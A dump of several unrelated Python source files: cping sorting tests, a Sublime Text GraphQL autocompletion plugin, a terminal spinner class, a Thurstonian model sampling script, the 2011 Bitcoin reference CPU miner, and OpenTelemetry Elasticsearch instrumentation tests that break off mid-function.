self.assertEqual(sorted_hosts, [self.host2, self.host1, self.host3])
def test_sorting_avg(self):
'''Sorting key 4 will sort by the average statistic.'''
hosts = [self.host1, self.host2, self.host3]
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 4)
self.assertEqual(sorted_hosts, [self.host3, self.host1, self.host2])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, -4)
self.assertEqual(sorted_hosts, [self.host2, self.host1, self.host3])
def test_sorting_stdev(self):
'''Sorting key 5 will sort by the standard deviation statistic.'''
hosts = [self.host3, self.host1, self.host2]
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 5)
self.assertEqual(sorted_hosts, [self.host3, self.host2, self.host1])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, -5)
self.assertEqual(sorted_hosts, [self.host1, self.host2, self.host3])
def test_sorting_loss(self):
'''Sorting key 6 will sort by the packet loss statistic.'''
hosts = [self.host3, self.host1, self.host2]
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 6)
self.assertEqual(sorted_hosts, [self.host1, self.host3, self.host2])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, -6)
self.assertEqual(sorted_hosts, [self.host2, self.host3, self.host1])
|
graphql.py
|
import sublime
import sublime_plugin
import re
import sys
import traceback
from threading import Thread
from ..deps import requests
from ..deps.graphql.parser import GraphQLParser
from ..deps.graphql.lexer import GraphQLLexer
from ..core import RequestCommandMixin
from ..core.parsers import parse_requests
from ..core.responses import prepare_request
placeholder = '__introspection_placeholder'
introspection_query = """
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
}
}
fragment InputValue on __InputValue {
name
type { ...TypeRef }
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
}
}
}
"""
def set_graphql_schema_on_view(view, req):
"""If request was to a GraphQL endpoint, send introspection query on a separate
thread, parse response and set it on view.
"""
if not req.skwargs.get('gql'):
return
def _set(view, url):
"""Ensure types and fields within types can be looked up quickly by name.
`types` dict has the following format:
typeName -> typeDict
Within `typeDict`, `fields` dict has similar format:
fieldName -> fieldDict
"""
kwargs = dict(req.kwargs)
kwargs.pop('params', None)
kwargs.pop('json', None)
kwargs['timeout'] = 3
try:
response = requests.get(url, params={'query': introspection_query}, **kwargs)
schema = response.json()['data']['__schema'] # get root `Query` type
query_type = schema['queryType']['name']
except:
response = requests.post(url, json={'query': introspection_query}, **kwargs)
schema = response.json()['data']['__schema'] # get root `Query` type
query_type = schema['queryType']['name']
types = {}
for t in schema['types']:
types[t['name']] = t
fields = {f['name']: f for f in (t['fields'] or [])}
t['fields'] = fields
view.settings().set('requester.gql_schema', (query_type, types))
thread = Thread(target=lambda: _set(view, req.url.split('?')[0]))
thread.start()
class RequesterGqlAutocompleteListener(sublime_plugin.EventListener):
def on_query_completions(self, view, prefix, locations):
"""Runs on all views, but is NOOP unless view is response view or history
view. Inside gql query string, only completions returned by this method
are shown.
"""
response_view = view.settings().get('requester.response_view', False)
history_view = view.settings().get('requester.history_view', False)
if not response_view and not history_view:
return None
content = view.substr(sublime.Region(0, view.size()))
m = re.search(r'\bgql\s*=\s*("|\')+', content)
if m is None:
return None
offset, idx = m.end(), view.sel()[0].begin()
try:
request = parse_requests(content, n=1)[0]
if getattr(view, '_env', None) is None:
view._env = RequestCommandMixin.get_env_dict_from_string(
view.settings().get('requester.env_string', None)
)
req = prepare_request(request, view._env, 1)
schema = view.settings().get('requester.gql_schema', None)
if not schema: # let user know schema is being retrieved
set_graphql_schema_on_view(view, req)
raise Exception('Loading GraphQL schema info')
gql = req.skwargs['gql']
completions = get_completions(gql, idx-offset, schema)
return completions
except Exception as e:
print('GraphQL Error:')
traceback.print_exc(file=sys.stdout)
return (
[[str(e), ' '], ['...', ' ']],
sublime.INHIBIT_WORD_COMPLETIONS | sublime.INHIBIT_EXPLICIT_COMPLETIONS
)
def get_completions(gql, idx, schema):
"""Creates AST from `gql` query string, finds out exactly where cursor is in
string, and uses `schema` to get appropriate completions. Doesn't protect
against exceptions. They should be handled by calling code.
"""
start, end = slurp_word(gql, idx)
gql_parser = GraphQLParser()
ast = gql_parser.parse(gql[:start] + placeholder + gql[end:], lexer=GraphQLLexer())
for query in ast.definitions: # get path if it exists
path = placeholder_path(query, placeholder)
if path is not None:
break
query_type, types = schema
t = resolve_type(path, types, query_type)
fields = types[t]['fields']
completions = []
for f in fields.values():
name = f['name']
args = [a['name'] + ':' for a in f['args']]
args_string = '({})'.format(', '.join(args)) if args else ''
type_name = resolve_field_type(f)
completions.append([
'{}{}\t{}'.format(name, args_string, type_name),
'{}{}'.format(name, args_string),
])
return (
completions,
sublime.INHIBIT_WORD_COMPLETIONS | sublime.INHIBIT_EXPLICIT_COMPLETIONS
)
def resolve_type(path, types, query_type):
"""Moves back and forth between field names in `path` and GraphQL types to
find type name of leaf node in path.
"""
t = query_type
for f in path[:-1]: # stop before reaching placeholder
field = types[t]['fields'][f]
t = resolve_field_type(field)
return t
def resolve_field_type(field):
"""Keep digging into field type until finding a non-null `name`.
"""
type_ = field['type']
while type_['name'] is None:
try:
type_ = type_['ofType']
except:
return None
return type_['name']
def placeholder_path(field, placeholder):
"""Not the most elegant implementation of DFS. It searches the whole tree and
keeps track of the path to each node. If it finds `placeholder`, it saves this
path and returns it after search is finished.
"""
path = None
def get_path(selection, placeholder, seen=tuple()):
for sel in selection.selections:
seen_next = seen + (sel.name,)
if sel.name == placeholder:
nonlocal path
path = seen_next
get_path(sel, placeholder, seen_next)
get_path(field, placeholder)
return path
def slurp_word(s, idx):
"""Returns index boundaries of word adjacent to `idx` in `s`.
"""
alnum = r'[A-Za-z0-9_]'
start, end = idx, idx
while True:
if re.match(alnum, s[start-1]):
start -= 1
else:
break
end = idx
while True:
if re.match(alnum, s[end]):
end += 1
else:
break
return start, end
|
spin.py
|
# -*- coding=utf-8 -*-
import functools
import os
import signal
import sys
import threading
import time
import colorama
import cursor
import six
from .compat import to_native_string
from .termcolors import COLOR_MAP, COLORS, colored, DISABLE_COLORS
from io import StringIO
try:
import yaspin
except ImportError:
yaspin = None
Spinners = None
else:
from yaspin.spinners import Spinners
handler = None
if yaspin and os.name == "nt":
handler = yaspin.signal_handlers.default_handler
elif yaspin and os.name != "nt":
handler = yaspin.signal_handlers.fancy_handler
CLEAR_LINE = chr(27) + "[K"
class DummySpinner(object):
def __init__(self, text="", **kwargs):
super(DummySpinner, self).__init__()
if DISABLE_COLORS:
colorama.init()
from .misc import decode_for_output
self.text = to_native_string(decode_for_output(text)) if text else ""
self.stdout = kwargs.get("stdout", sys.stdout)
self.stderr = kwargs.get("stderr", sys.stderr)
self.out_buff = StringIO()
self.write_to_stdout = kwargs.get("write_to_stdout", False)
def __enter__(self):
if self.text and self.text != "None":
if self.write_to_stdout:
self.write(self.text)
return self
def __exit__(self, exc_type, exc_val, traceback):
if exc_type:
import traceback
from .misc import decode_for_output
self.write_err(decode_for_output(traceback.format_exception(*sys.exc_info())))
self._close_output_buffer()
return False
def __getattr__(self, k):
try:
retval = super(DummySpinner, self).__getattribute__(k)
except AttributeError:
if k in COLOR_MAP.keys() or k.upper() in COLORS:
return self
raise
else:
return retval
def _close_output_buffer(self):
if self.out_buff and not self.out_buff.closed:
try:
self.out_buff.close()
except Exception:
pass
def fail(self, exitcode=1, text="FAIL"):
from .misc import decode_for_output
if text and text != "None":
if self.write_to_stdout:
self.write(decode_for_output(text))
else:
self.write_err(decode_for_output(text))
self._close_output_buffer()
def ok(self, text="OK"):
if text and text != "None":
if self.write_to_stdout:
self.stdout.write(self.text)
else:
self.stderr.write(self.text)
self._close_output_buffer()
return 0
def hide_and_write(self, text, target=None):
if not target:
target = self.stdout
from .misc import decode_for_output
if text is None or isinstance(text, six.string_types) and text == "None":
pass
target.write(decode_for_output("\r"))
self._hide_cursor(target=target)
target.write(decode_for_output("{0}\n".format(text)))
target.write(CLEAR_LINE)
self._show_cursor(target=target)
def write(self, text=None):
if not self.write_to_stdout:
return self.write_err(text)
from .misc import decode_for_output
if text is None or isinstance(text, six.string_types) and text == "None":
pass
text = decode_for_output(text)
self.stdout.write(decode_for_output("\r"))
line = decode_for_output("{0}\n".format(text))
self.stdout.write(line)
self.stdout.write(CLEAR_LINE)
def write_err(self, text=None):
from .misc import decode_for_output
if text is None or isinstance(text, six.string_types) and text == "None":
pass
text = decode_for_output(text)
self.stderr.write(decode_for_output("\r"))
line = decode_for_output("{0}\n".format(text))
self.stderr.write(line)
self.stderr.write(CLEAR_LINE)
@staticmethod
def _hide_cursor(target=None):
pass
@staticmethod
def _show_cursor(target=None):
pass
base_obj = yaspin.core.Yaspin if yaspin is not None else DummySpinner
class VistirSpinner(base_obj):
"A spinner class for handling spinners on windows and posix."
def __init__(self, *args, **kwargs):
"""
Get a spinner object or a dummy spinner to wrap a context.
Keyword Arguments:
:param str spinner_name: A spinner type e.g. "dots" or "bouncingBar" (default: {"bouncingBar"})
:param str start_text: Text to start off the spinner with (default: {None})
:param dict handler_map: Handler map for signals to be handled gracefully (default: {None})
:param bool nospin: If true, use the dummy spinner (default: {False})
:param bool write_to_stdout: Writes to stdout if true, otherwise writes to stderr (default: True)
"""
self.handler = handler
colorama.init()
sigmap = {}
if handler:
sigmap.update({
signal.SIGINT: handler,
signal.SIGTERM: handler
})
handler_map = kwargs.pop("handler_map", {})
if os.name == "nt":
sigmap[signal.SIGBREAK] = handler
else:
sigmap[signal.SIGALRM] = handler
if handler_map:
sigmap.update(handler_map)
spinner_name = kwargs.pop("spinner_name", "bouncingBar")
start_text = kwargs.pop("start_text", None)
_text = kwargs.pop("text", "Running...")
kwargs["text"] = start_text if start_text is not None else _text
kwargs["sigmap"] = sigmap
kwargs["spinner"] = getattr(Spinners, spinner_name, "")
write_to_stdout = kwargs.pop("write_to_stdout", True)
self.stdout = kwargs.pop("stdout", sys.stdout)
self.stderr = kwargs.pop("stderr", sys.stderr)
self.out_buff = StringIO()
self.write_to_stdout = write_to_stdout
self.is_dummy = bool(yaspin is None)
if os.environ.get("ANSI_COLORS_DISABLED", False):
colorama.deinit()
super(VistirSpinner, self).__init__(*args, **kwargs)
def ok(self, text="OK", err=False):
"""Set Ok (success) finalizer to a spinner."""
# Do not display spin text for ok state
self._text = None
_text = text if text else "OK"
err = err or not self.write_to_stdout
self._freeze(_text, err=err)
def fail(self, text="FAIL", err=False):
"""Set fail finalizer to a spinner."""
# Do not display spin text for fail state
self._text = None
_text = text if text else "FAIL"
err = err or not self.write_to_stdout
self._freeze(_text, err=err)
def hide_and_write(self, text, target=None):
if not target:
target = self.stdout
from .misc import decode_for_output
if text is None or isinstance(text, six.string_types) and text == "None":
pass
target.write(decode_for_output("\r"))
self._hide_cursor(target=target)
target.write(decode_for_output("{0}\n".format(text)))
target.write(CLEAR_LINE)
self._show_cursor(target=target)
def write(self, text):
if not self.write_to_stdout:
return self.write_err(text)
from .misc import to_text
sys.stdout.write("\r")
self.stdout.write(CLEAR_LINE)
if text is None:
text = ""
text = to_native_string("{0}\n".format(text))
self.stdout.write(text)
self.out_buff.write(to_text(text))
def write_err(self, text):
"""Write error text in the terminal without breaking the spinner."""
from .misc import to_text
self.stderr.write("\r")
self.stderr.write(CLEAR_LINE)
if text is None:
text = ""
text = to_native_string("{0}\n".format(text))
self.stderr.write(text)
self.out_buff.write(to_text(text))
def start(self):
if self._sigmap:
self._register_signal_handlers()
target = self.stdout if self.write_to_stdout else self.stderr
if target.isatty():
self._hide_cursor(target=target)
self._stop_spin = threading.Event()
self._hide_spin = threading.Event()
self._spin_thread = threading.Thread(target=self._spin)
self._spin_thread.start()
def stop(self):
if self._dfl_sigmap:
# Reset registered signal handlers to default ones
self._reset_signal_handlers()
if self._spin_thread:
self._stop_spin.set()
self._spin_thread.join()
target = self.stdout if self.write_to_stdout else self.stderr
if target.isatty():
target.write("\r")
if self.write_to_stdout:
self._clear_line()
else:
self._clear_err()
if target.isatty():
self._show_cursor(target=target)
if self.stderr and self.stderr != sys.stderr:
self.stderr.close()
if self.stdout and self.stdout != sys.stdout:
self.stdout.close()
self.out_buff.close()
def _freeze(self, final_text, err=False):
"""Stop spinner, compose last frame and 'freeze' it."""
if not final_text:
final_text = ""
text = to_native_string(final_text)
self._last_frame = self._compose_out(text, mode="last")
# Should be stopped here, otherwise prints after
# self._freeze call will mess up the spinner
self.stop()
if err or not self.write_to_stdout:
self.stderr.write(self._last_frame)
else:
self.stdout.write(self._last_frame)
def _compose_color_func(self):
fn = functools.partial(
colored,
color=self._color,
on_color=self._on_color,
attrs=list(self._attrs),
)
return fn
def _compose_out(self, frame, mode=None):
# Ensure Unicode input
frame = to_native_string(frame)
if self._text is None:
self._text = ""
text = to_native_string(self._text)
if self._color_func is not None:
frame = self._color_func(frame)
if self._side == "right":
frame, text = text, frame
# Mode
if not mode:
out = to_native_string("\r{0} {1}".format(frame, text))
else:
out = to_native_string("{0} {1}\n".format(frame, text))
return out
def _spin(self):
target = self.stdout if self.write_to_stdout else self.stderr
clear_fn = self._clear_line if self.write_to_stdout else self._clear_err
while not self._stop_spin.is_set():
if self._hide_spin.is_set():
# Wait a bit to avoid wasting cycles
time.sleep(self._interval)
continue
# Compose output
spin_phase = next(self._cycle)
out = self._compose_out(spin_phase)
# Write
target.write(out)
clear_fn()
target.flush()
# Wait
time.sleep(self._interval)
target.write("\b")
def _register_signal_handlers(self):
# SIGKILL cannot be caught or ignored, and the receiving
# process cannot perform any clean-up upon receiving this
# signal.
try:
if signal.SIGKILL in self._sigmap.keys():
raise ValueError(
"Trying to set handler for SIGKILL signal. "
"SIGKILL cannot be cought or ignored in POSIX systems."
)
except AttributeError:
pass
for sig, sig_handler in self._sigmap.items():
# A handler for a particular signal, once set, remains
# installed until it is explicitly reset. Store default
# signal handlers for subsequent reset at cleanup phase.
dfl_handler = signal.getsignal(sig)
self._dfl_sigmap[sig] = dfl_handler
# ``signal.SIG_DFL`` and ``signal.SIG_IGN`` are also valid
# signal handlers and are not callables.
if callable(sig_handler):
# ``signal.signal`` accepts handler function which is
# called with two arguments: signal number and the
# interrupted stack frame. ``functools.partial`` solves
# the problem of passing spinner instance into the handler
# function.
sig_handler = functools.partial(sig_handler, spinner=self)
signal.signal(sig, sig_handler)
def _reset_signal_handlers(self):
for sig, sig_handler in self._dfl_sigmap.items():
signal.signal(sig, sig_handler)
@staticmethod
def _hide_cursor(target=None):
if not target:
target = sys.stdout
cursor.hide(stream=target)
@staticmethod
def _show_cursor(target=None):
if not target:
target = sys.stdout
cursor.show(stream=target)
@staticmethod
def _clear_err():
sys.stderr.write(CLEAR_LINE)
@staticmethod
def _clear_line():
sys.stdout.write(CLEAR_LINE)
def create_spinner(*args, **kwargs):
nospin = kwargs.pop("nospin", False)
use_yaspin = kwargs.pop("use_yaspin", not nospin)
if nospin or not use_yaspin:
return DummySpinner(*args, **kwargs)
return VistirSpinner(*args, **kwargs)
|
set_cmdstan_loc.py
|
# -*- coding: utf-8 -*-
"""
Created on Mon May 14 11:03:18 2018
@author: pscog
"""
from PyThurstonian import thurstonian, run_sample
from simulate_data import simulate_data
import ranking as rk
import numpy as np
import pandas as pd
from multiprocessing import Process
if __name__ == '__main__':
#Load and preprocess data
K = 3 #Number of items
J = 10 #Number of participants
L = 1 #Number of trials
C = 2 #Number of conditions
beta = np.array([[0.0, 1.0, 2.0],
[0.0, 0.1, 0.2]])
data, sim_scale = simulate_data(K, J, L, C, beta = beta, seed = 4354356)
data['Subj'] = pd.factorize(data['Subj'])[0]+1
myThurst = thurstonian(design_formula = '~0+Condition', data = data, subject_name = "Subj")
myThurst.pre_sample()
P = [Process(target=run_sample, kwargs = {'temp_fnum': i}) for i in range(4)]
for p in P:
p.start()
for p in P:
p.join()
myThurst.post_sample()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 5322
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_elasticsearch.py
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import threading
from ast import literal_eval
from unittest import mock
import elasticsearch
import elasticsearch.exceptions
from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search
import opentelemetry.instrumentation.elasticsearch
from opentelemetry.instrumentation.elasticsearch import (
ElasticsearchInstrumentor,
)
from opentelemetry.test.test_base import TestBase
from opentelemetry.trace.status import StatusCanonicalCode
major_version = elasticsearch.VERSION[0]
if major_version == 7:
from . import helpers_es7 as helpers # pylint: disable=no-name-in-module
elif major_version == 6:
from . import helpers_es6 as helpers # pylint: disable=no-name-in-module
elif major_version == 5:
from . import helpers_es5 as helpers # pylint: disable=no-name-in-module
else:
from . import helpers_es2 as helpers # pylint: disable=no-name-in-module
Article = helpers.Article
@mock.patch(
"elasticsearch.connection.http_urllib3.Urllib3HttpConnection.perform_request"
)
class TestElasticsearchIntegration(TestBase):
def setUp(self):
super().setUp()
self.tracer = self.tracer_provider.get_tracer(__name__)
ElasticsearchInstrumentor().instrument()
def tearDown(self):
super().tearDown()
with self.disable_logging():
ElasticsearchInstrumentor().uninstrument()
def get_ordered_finished_spans(self):
return sorted(
self.memory_exporter.get_finished_spans(),
key=lambda s: s.start_time,
)
def test_instrumentor(self, request_mock):
request_mock.return_value = (1, {}, {})
es = Elasticsearch()
es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
spans_list = self.get_ordered_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
# Check version and name in span's instrumentation info
# self.check_span_instrumentation_info(span, opentelemetry.instrumentation.elasticsearch)
self.check_span_instrumentation_info(
span, opentelemetry.instrumentation.elasticsearch
)
# check that no spans are generated after uninstrument
ElasticsearchInstrumentor().uninstrument()
es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
spans_list = self.get_ordered_finished_spans()
self.assertEqual(len(spans_list), 1)
def test_span_not_recording(self, request_mock):
request_mock.return_value = (1, {}, {})
mock_tracer = mock.Mock()
mock_span = mock.Mock()
mock_span.is_recording.return_value = False
mock_tracer.start_span.return_value = mock_span
mock_tracer.use_span.return_value.__enter__ = mock_span
mock_tracer.use_span.return_value.__exit__ = mock_span
with mock.patch("opentelemetry.trace.get_tracer") as tracer:
tracer.return_value = mock_tracer
Elasticsearch()
self.assertFalse(mock_span.is_recording())
self.assertTrue(mock_span.is_recording.called)
self.assertFalse(mock_span.set_attribute.called)
self.assertFalse(mock_span.set_status.called)
ElasticsearchInstrumentor().uninstrument()
def test_prefix_arg(self, request_mock):
prefix = "prefix-from-env"
ElasticsearchInstrumentor().uninstrument()
ElasticsearchInstrumentor(span_name_prefix=prefix).instrument()
request_mock.return_value = (1, {}, {})
self._test_prefix(prefix)
def test_prefix_env(self, request_mock):
prefix = "prefix-from-args"
env_var = "OTEL_PYTHON_ELASTICSEARCH_NAME_PREFIX"
os.environ[env_var] = prefix
ElasticsearchInstrumentor().uninstrument()
ElasticsearchInstrumentor().instrument()
request_mock.return_value = (1, {}, {})
del os.environ[env_var]
self._test_prefix(prefix)
def _test_prefix(self, prefix):
es = Elasticsearch()
es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
spans_list = self.get_ordered_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertTrue(span.name.startswith(prefix))
def test_result_values(self, request_mock):
request_mock.return_value = (
1,
{},
'{"found": false, "timed_out": true, "took": 7}',
)
es = Elasticsearch()
es.get(index="test-index", doc_type="tweet", id=1)
spans = self.get_ordered_finished_spans()
self.assertEqual(1, len(spans))
self.assertEqual("False", spans[0].attributes["elasticsearch.found"])
self.assertEqual(
"True", spans[0].attributes["elasticsearch.timed_out"]
)
self.assertEqual("7", spans[0].attributes["elasticsearch.took"])
def test_trace_error_unknown(self, request_mock):
exc = RuntimeError("custom error")
request_mock.side_effect = exc
self._test_trace_error(StatusCanonicalCode.UNKNOWN, exc)
def test_trace_error_not_found(self, request_mock):
msg = "record not found"
exc = elasticsearch.exceptions.NotFoundError(404, msg)
request_mock.return_value = (1, {}, {})
request_mock.side_effect = exc
self._test_trace_error(StatusCanonicalCode.NOT_FOUND, exc)
def _test_trace_error(self, code, exc):
es = Elasticsearch()
try:
es.get(index="test-index", doc_type="tweet", id=1)
except Exception: # pylint: disable=broad-except
pass
spans = self.get_ordered_finished_spans()
self.assertEqual(1, len(spans))
span = spans[0]
self.assertFalse(span.status.is_ok)
self.assertEqual(span.status.canonical_code, code)
self.assertEqual(span.status.description, str(exc))
def test_parent(self, request_mock):
request_mock.return_value = (1, {}, {})
es = Elasticsearch()
with self.tracer.start_as_current_span("parent"):
es.index(
index="sw", doc_type="people", id=1, body={"name": "adam"}
)
spans = self.get_ordered_finished_spans()
self.assertEqual(len(spans), 2)
self.assertEqual(spans[0].name, "parent")
self.assertEqual(spans[1].name, "Elasticsearch/sw/people/1")
self.assertIsNotNone(spans[1].parent)
self.assertEqual(spans[1].parent.span_id, spans[0].context.span_id)
def test_multithread(self, request_mock):
request_mock.return_value = (1, {}, {})
es = Elasticsearch()
ev = threading.Event()
# 1. Start tracing from thread-1; make thread-2 wait
# 2. Trace something from thread-2, make thread-1 join before finishing.
# 3. Check the spans got different parents, and are in the expected order.
def target1(parent_span):
with self.tracer.use_span(parent_span):
es.get(index="test-index", doc_type="tweet", id=1)
ev.set()
ev.wait()
def target2():
ev.wait()
es.get(index="test-index", doc_type="tweet", id=2)
ev.set()
with self.tracer.start_as_current_span("parent") as span:
t1 = threading.Thread(target=target1, args=(span,))
t1.start()
t2 = threading.Thread(target=target2)
t2.start()
t1.join()
t2.join()
spans = self.get_ordered_finished_spans()
self.assertEqual(3, len(spans))
s1, s2, s3 = spans
self.assertEqual(s1.name, "parent")
self.assertEqual(s2.name, "Elasticsearch/test-index/tweet/1")
self.assertIsNotNone(s2.parent)
self.assertEqual(s2.parent.span_id, s1.context.span_id)
self.assertEqual(s3.name, "Elasticsearch/test-index/tweet/2")
self.assertIsNone(s3.parent)
def test_dsl_search(self, request_mock):
request_mock.return_value = (1, {}, '{"hits": {"hits": []}}')
client = Elasticsearch()
search = Search(using=client, index="test-index").filter(
"term", author="testing"
)
search.execute()
spans = self.get_ordered_finished_spans()
span = spans[0]
self.assertEqual(1, len(spans))
self.assertEqual(span.name, "Elasticsearch/test-index/_search")
self.assertIsNotNone(span.end_time)
self.assertEqual(
span.attributes,
{
"component": "elasticsearch-py",
"db.type": "elasticsearch",
"elasticsearch.url": "/test-index/_search",
"elasticsearch.method": helpers.dsl_search_method,
"db.statement": str(
{
"query": {
"bool": {
"filter": [{"term": {"author": "testing"}}]
}
}
}
),
},
)
def test_dsl_create(self, request_mock):
request_mock.return_value = (1, {}, {})
client = Elasticsearch()
Article.init(using=client)
spans = self.get_ordered_finished_spans()
self.assertEqual(2, len(spans))
span1, span2 = spans
self.assertEqual(span1.name, "Elasticsearch/test-index")
self.assertEqual(
span1.attributes,
{
"component": "elasticsearch-py",
"db.type": "elasticsearch",
"elasticsearch.url": "/test-index",
"elasticsearch.method": "HEAD",
},
)
self.assertEqual(span2.name, "Elasticsearch/test-index")
attributes = {
"component": "elasticsearch-py",
"db.type": "elasticsearch",
"elasticsearch.url": "/test-index",
"elasticsearch.method": "PUT",
}
self.assert_span_has_attributes(span2, attributes)
self.assertEqual(
literal_eval(span2.attributes["db.statement"]),
helpers.dsl_create_statement,
)
def test_dsl_index(self, request_mock):
request_mock.return_value = helpers.dsl_index_result
client = Elasticsearch()
article = Article(
meta={"id": 2},
title="About searching",
body="A few words here, a few words there",
)
res = article.save(using=client)
self.assertTrue(res)
spans = self.get_ordered_finished_spans()
self.assertEqual(1, len(spans))
span = spans[0]
